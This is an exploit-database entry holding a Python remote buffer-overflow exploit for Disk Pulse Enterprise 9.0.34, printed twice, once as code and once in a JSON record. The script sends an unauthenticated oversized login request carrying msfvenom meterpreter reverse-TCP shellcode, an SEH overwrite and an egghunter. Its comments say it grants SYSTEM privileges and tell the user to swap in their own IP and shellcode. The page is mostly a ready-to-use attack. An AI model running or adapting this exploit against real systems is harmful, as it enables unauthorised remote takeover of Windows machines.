Search...

Disk Pulse Enterprise 9.0.34 - Buffer Overflow Exploit

2016-10-04T00:00:00

ID 1337DAY-ID-25323
Type zdt
Reporter Tulpa
Modified 2016-10-04T00:00:00

Description

Exploit for windows platform in category remote exploits

                                        
                                            #!/usr/bin/python
 
print "Disk Pulse Enterprise 9.0.34 Buffer Overflow Exploit"
print "Author: Tulpa // tulpa[at]tulpa-security[dot]com"
 
#Author website: www.tulpa-security.com
#Author twitter: @tulpa-security.com
 
#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1
 
#Greetings to ozzie_offsec and carbonated
#Special Shoutout to unfo- for making me look closer
 
import socket
import sys
 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.132',80))
 
#bad chars \x00\x0a\x0d\x26
 
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
 
#payload size 308
 
buf =  ""
buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b"
buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9"
buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda"
buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a"
buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8"
buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c"
buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1"
buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76"
buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27"
buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb"
buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4"
buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17"
buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40"
buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55"
buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa"
buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48"
buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b"
buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8"
buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84"
buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6"
buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c"
buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1"
buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f"
buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc"
 
#pop pop ret 1001A333
 
nseh = "\x90\x90\xEB\x0B"
seh = "\x33\xA3\x01\x10"
 
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
 
 
evil =  "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 12292 #subtract/add for payload
evil += "w00tw00t"
evil += "\x90" * 20
evil += buf
evil += "\x90" * 50
evil += "\x42" * 1614
evil += nseh
evil += seh
evil += "\x90" * 20
evil += egghunter
evil += "\x90" * 7000
 
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()

#  0day.today [2018-01-01]  #

JSON Vulners Source

Initial Source

{"published": "2016-10-04T00:00:00", "id": "1337DAY-ID-25323", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for windows platform in category remote exploits", "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2018-01-01T23:01:26", "rev": 2}, "dependencies": {"references": [], "modified": "2018-01-01T23:01:26", "rev": 2}, "vulnersScore": 0.0}, "type": "zdt", "lastseen": "2018-01-01T23:01:26", "edition": 2, "title": "Disk Pulse Enterprise 9.0.34 - Buffer Overflow Exploit", "href": "https://0day.today/exploit/description/25323", "modified": "2016-10-04T00:00:00", "bulletinFamily": "exploit", "viewCount": 8, "cvelist": [], "sourceHref": "https://0day.today/exploit/25323", "references": [], "reporter": "Tulpa", "sourceData": "#!/usr/bin/python\r\n \r\nprint \"Disk Pulse Enterprise 9.0.34 Buffer Overflow Exploit\"\r\nprint \"Author: Tulpa // tulpa[at]tulpa-security[dot]com\"\r\n \r\n#Author website: www.tulpa-security.com\r\n#Author twitter: @tulpa-security.com\r\n \r\n#Exploit will land you NT AUTHORITY\\SYSTEM\r\n#You do not need to be authenticated, password below is garbage\r\n#Swop out IP, shellcode and remember to adjust '\\x41' for bytes\r\n#Tested on Windows 7 x86 Enterprise SP1\r\n \r\n#Greetings to ozzie_offsec and carbonated\r\n#Special Shoutout to unfo- for making me look closer\r\n \r\nimport socket\r\nimport sys\r\n \r\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\nconnect=s.connect(('192.168.123.132',80))\r\n \r\n#bad chars \\x00\\x0a\\x0d\\x26\r\n \r\n#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\\x00\\x0a\\x0d\\x26' -f python --smallest\r\n \r\n#payload size 308\r\n \r\nbuf = \"\"\r\nbuf += \"\\xda\\xd9\\xba\\x43\\x1b\\x3f\\x40\\xd9\\x74\\x24\\xf4\\x58\\x2b\"\r\nbuf += \"\\xc9\\xb1\\x47\\x31\\x50\\x18\\x03\\x50\\x18\\x83\\xc0\\x47\\xf9\"\r\nbuf += \"\\xca\\xbc\\xaf\\x7f\\x34\\x3d\\x2f\\xe0\\xbc\\xd8\\x1e\\x20\\xda\"\r\nbuf += \"\\xa9\\x30\\x90\\xa8\\xfc\\xbc\\x5b\\xfc\\x14\\x37\\x29\\x29\\x1a\"\r\nbuf += \"\\xf0\\x84\\x0f\\x15\\x01\\xb4\\x6c\\x34\\x81\\xc7\\xa0\\x96\\xb8\"\r\nbuf += \"\\x07\\xb5\\xd7\\xfd\\x7a\\x34\\x85\\x56\\xf0\\xeb\\x3a\\xd3\\x4c\"\r\nbuf += \"\\x30\\xb0\\xaf\\x41\\x30\\x25\\x67\\x63\\x11\\xf8\\xfc\\x3a\\xb1\"\r\nbuf += \"\\xfa\\xd1\\x36\\xf8\\xe4\\x36\\x72\\xb2\\x9f\\x8c\\x08\\x45\\x76\"\r\nbuf += \"\\xdd\\xf1\\xea\\xb7\\xd2\\x03\\xf2\\xf0\\xd4\\xfb\\x81\\x08\\x27\"\r\nbuf += \"\\x81\\x91\\xce\\x5a\\x5d\\x17\\xd5\\xfc\\x16\\x8f\\x31\\xfd\\xfb\"\r\nbuf += \"\\x56\\xb1\\xf1\\xb0\\x1d\\x9d\\x15\\x46\\xf1\\x95\\x21\\xc3\\xf4\"\r\nbuf += \"\\x79\\xa0\\x97\\xd2\\x5d\\xe9\\x4c\\x7a\\xc7\\x57\\x22\\x83\\x17\"\r\nbuf += \"\\x38\\x9b\\x21\\x53\\xd4\\xc8\\x5b\\x3e\\xb0\\x3d\\x56\\xc1\\x40\"\r\nbuf += \"\\x2a\\xe1\\xb2\\x72\\xf5\\x59\\x5d\\x3e\\x7e\\x44\\x9a\\x41\\x55\"\r\nbuf += \"\\x30\\x34\\xbc\\x56\\x41\\x1c\\x7a\\x02\\x11\\x36\\xab\\x2b\\xfa\"\r\nbuf += \"\\xc6\\x54\\xfe\\x97\\xc3\\xc2\\xc1\\xc0\\xb7\\x92\\xaa\\x12\\x48\"\r\nbuf += \"\\x83\\x76\\x9a\\xae\\xf3\\xd6\\xcc\\x7e\\xb3\\x86\\xac\\x2e\\x5b\"\r\nbuf += \"\\xcd\\x22\\x10\\x7b\\xee\\xe8\\x39\\x11\\x01\\x45\\x11\\x8d\\xb8\"\r\nbuf += \"\\xcc\\xe9\\x2c\\x44\\xdb\\x97\\x6e\\xce\\xe8\\x68\\x20\\x27\\x84\"\r\nbuf += \"\\x7a\\xd4\\xc7\\xd3\\x21\\x72\\xd7\\xc9\\x4c\\x7a\\x4d\\xf6\\xc6\"\r\nbuf += \"\\x2d\\xf9\\xf4\\x3f\\x19\\xa6\\x07\\x6a\\x12\\x6f\\x92\\xd5\\x4c\"\r\nbuf += \"\\x90\\x72\\xd6\\x8c\\xc6\\x18\\xd6\\xe4\\xbe\\x78\\x85\\x11\\xc1\"\r\nbuf += \"\\x54\\xb9\\x8a\\x54\\x57\\xe8\\x7f\\xfe\\x3f\\x16\\xa6\\xc8\\x9f\"\r\nbuf += \"\\xe9\\x8d\\xc8\\xdc\\x3f\\xeb\\xbe\\x0c\\xfc\"\r\n \r\n#pop pop ret 1001A333\r\n \r\nnseh = \"\\x90\\x90\\xEB\\x0B\"\r\nseh = \"\\x33\\xA3\\x01\\x10\"\r\n \r\negghunter = \"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\"\r\negghunter += \"\\xef\\xb8\\x77\\x30\\x30\\x74\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\r\n \r\n \r\nevil = \"POST /login HTTP/1.1\\r\\n\"\r\nevil += \"Host: 192.168.123.132\\r\\n\"\r\nevil += \"User-Agent: Mozilla/5.0\\r\\n\"\r\nevil += \"Connection: close\\r\\n\"\r\nevil += \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\"\r\nevil += \"Accept-Language: en-us,en;q=0.5\\r\\n\"\r\nevil += \"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n\"\r\nevil += \"Keep-Alive: 300\\r\\n\"\r\nevil += \"Proxy-Connection: keep-alive\\r\\n\"\r\nevil += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\nevil += \"Content-Length: 17000\\r\\n\\r\\n\"\r\nevil += \"username=admin\"\r\nevil += \"&password=aaaaa\\r\\n\"\r\nevil += \"\\x41\" * 12292 #subtract/add for payload\r\nevil += \"w00tw00t\"\r\nevil += \"\\x90\" * 20\r\nevil += buf\r\nevil += \"\\x90\" * 50\r\nevil += \"\\x42\" * 1614\r\nevil += nseh\r\nevil += seh\r\nevil += \"\\x90\" * 20\r\nevil += egghunter\r\nevil += \"\\x90\" * 7000\r\n \r\nprint 'Sending evil buffer...'\r\ns.send(evil)\r\nprint 'Payload Sent!'\r\ns.close()\n\n# 0day.today [2018-01-01] #"}